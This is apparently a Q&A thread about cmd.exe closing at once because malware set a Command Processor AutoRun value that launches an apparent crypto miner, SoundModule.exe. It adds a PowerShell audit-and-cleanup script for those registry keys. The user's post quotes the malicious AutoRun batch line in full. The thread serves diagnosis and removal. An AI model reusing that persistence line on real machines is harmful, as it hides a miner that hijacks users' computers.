Tags: windows, batch-file, cmd, registry

CMD.exe closes immediately - unusual line in AutoRun registry entry


I've noticed that my command line didn't start anymore, it just immediately minimized and closed itself upon running. I suspect this is due to a virus or at least some kind of malicious program having been executed. I found the following code inside my registry. It seems legible but my knowledge of batch / the command line is limited. Can anyone tell me what it does?

@mode 20,5 & tasklist /FI "IMAGENAME eq SoundModule.exe" 2>NUL | find /I /N "SoundModule.exe">NUL && exit & if exist "C:\Users\Leon\AppData\Roaming\Microsoft\SoundModule\SoundModule.exe" ( start /MIN "" "C:\Users\Leon\AppData\Roaming\Microsoft\SoundModule\SoundModule.exe" & tasklist /FI "IMAGENAME eq explorer.exe" 2>NUL | find /I /N "explorer.exe">NUL && exit & explorer.exe & exit ) else ( tasklist /FI "IMAGENAME eq explorer.exe" 2>NUL | find /I /N "explorer.exe">NUL && exit & explorer.exe & exit )

Solution

  • According to this reddit thread, it's a "vmprotected cryptocurrency miner".

    You most likely got it if you installed anything you downloaded from the torrent network, for example a popular game released in the past few weeks :^)

    The following SO thread contains part of the solution: CMD.exe closes immediately after calling (Win7 64)

    The malicious party added an AutoRun directive via registry to the Windows Command Processor (cmd.exe usually), which you need to remove from any of the following locations it's present in:

    • Computer\HKEY_CURRENT_USER\Software\Microsoft\Command Processor
    • Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor

    What the directive does is to execute SoundModule.exe and then explorer.exe (if not already started).

    According to the other reply in this thread, they set %comspec% to run at startup, via Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon.

    So on startup, it's running %comspec% (instead of the default Windows Explorer), which itself on start first runs SoundModule.exe and then explorer.exe. Not sure why they did it this way; anyone who makes use of cmd.exe was bound to figure it out and spread the word.

    There are at least two confirmed VirusTotal records for this file: [1], [2]
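The following PowerShell script is an added example, not part of the question or the answer above, that audits the persistence locations the answer names (the Command Processor AutoRun value in HKCU and HKLM, and the Winlogon shell setting in HKCU and HKLM) and, only when run with an -Apply switch, removes or resets them. It assumes the value names are AutoRun and Shell (the standard Windows value names for these settings; the answer only names the keys), that the marker string SoundModule from the question's command line identifies the unwanted entry, and that the default shell value is explorer.exe. The -Apply switch and the Find-CmdPersistence function name are this example's own. Run it in an elevated PowerShell so the HKLM keys are writable; without -Apply it only reports.

```powershell
# Added example (not from the original post): report and, with -Apply, clean the
# cmd.exe AutoRun and Winlogon Shell persistence described in the answer.
param([switch]$Apply)

# Marker taken from the question's AutoRun line; adjust if your entry differs.
$SuspectMarker = 'SoundModule'

# Assumed value names: AutoRun under Command Processor, Shell under Winlogon.
$Locations = @(
    @{ Path = 'HKCU:\Software\Microsoft\Command Processor';                  Name = 'AutoRun' },
    @{ Path = 'HKLM:\SOFTWARE\Microsoft\Command Processor';                  Name = 'AutoRun' },
    @{ Path = 'HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon'; Name = 'Shell'   },
    @{ Path = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'; Name = 'Shell'   }
)

function Find-CmdPersistence {
    param([string]$Path, [string]$Name)
    # Returns the registry value as a string, or $null if key or value is absent.
    if (-not (Test-Path $Path)) { return $null }
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [string]$item.$Name
}

foreach ($loc in $Locations) {
    $full  = "$($loc.Path)\$($loc.Name)"
    $value = Find-CmdPersistence -Path $loc.Path -Name $loc.Name

    if ([string]::IsNullOrEmpty($value)) {
        Write-Host "[ok]      $full is not set"
        continue
    }
    Write-Host "[found]   $full = $value"

    # AutoRun has no legitimate default at all; a Shell value that points at
    # cmd.exe / %comspec% or contains the marker is the hijack from the answer.
    $suspicious = ($value -match [regex]::Escape($SuspectMarker)) -or
                  ($loc.Name -eq 'Shell' -and $value -match 'cmd\.exe|%comspec%')
    if (-not $suspicious) {
        Write-Host "[review]  $full does not match the known pattern; inspect manually"
        continue
    }

    if (-not $Apply) {
        Write-Host "[dry-run] would clean $full (re-run with -Apply)"
        continue
    }

    if ($loc.Name -eq 'AutoRun' -or $loc.Path -like 'HKCU:*') {
        # AutoRun is simply deleted; an HKCU Shell override is deleted so the
        # HKLM default applies again.
        Remove-ItemProperty -Path $loc.Path -Name $loc.Name
        Write-Host "[removed] $full"
    } else {
        # HKLM Shell must exist; reset it to the Windows default.
        Set-ItemProperty -Path $loc.Path -Name $loc.Name -Value 'explorer.exe'
        Write-Host "[reset]   $full = explorer.exe"
    }
}

# The dropped binary from the question: stop it and show where it lives so the
# file can be submitted to a scanner and deleted.
$procs = Get-Process -Name $SuspectMarker -ErrorAction SilentlyContinue
if ($procs) {
    $procs | ForEach-Object { Write-Host "[running] $($_.ProcessName) pid $($_.Id) $($_.Path)" }
    if ($Apply) { $procs | Stop-Process -Force; Write-Host "[stopped] $SuspectMarker" }
}
$dropPath = Join-Path $env:APPDATA "Microsoft\$SuspectMarker\$SuspectMarker.exe"
if (Test-Path $dropPath) { Write-Host "[file]    $dropPath still present; remove after scanning" }
```

The script deliberately separates reporting from cleanup: the first run shows every value it would touch, and only the -Apply run changes the registry. Resetting HKLM Shell rather than deleting it matters, because Winlogon needs that value to launch a desktop at all; the HKCU copy is an override and can be removed outright. After cleaning, open a fresh cmd.exe and confirm it stays open and that `reg query "HKCU\Software\Microsoft\Command Processor" /v AutoRun` reports the value as missing.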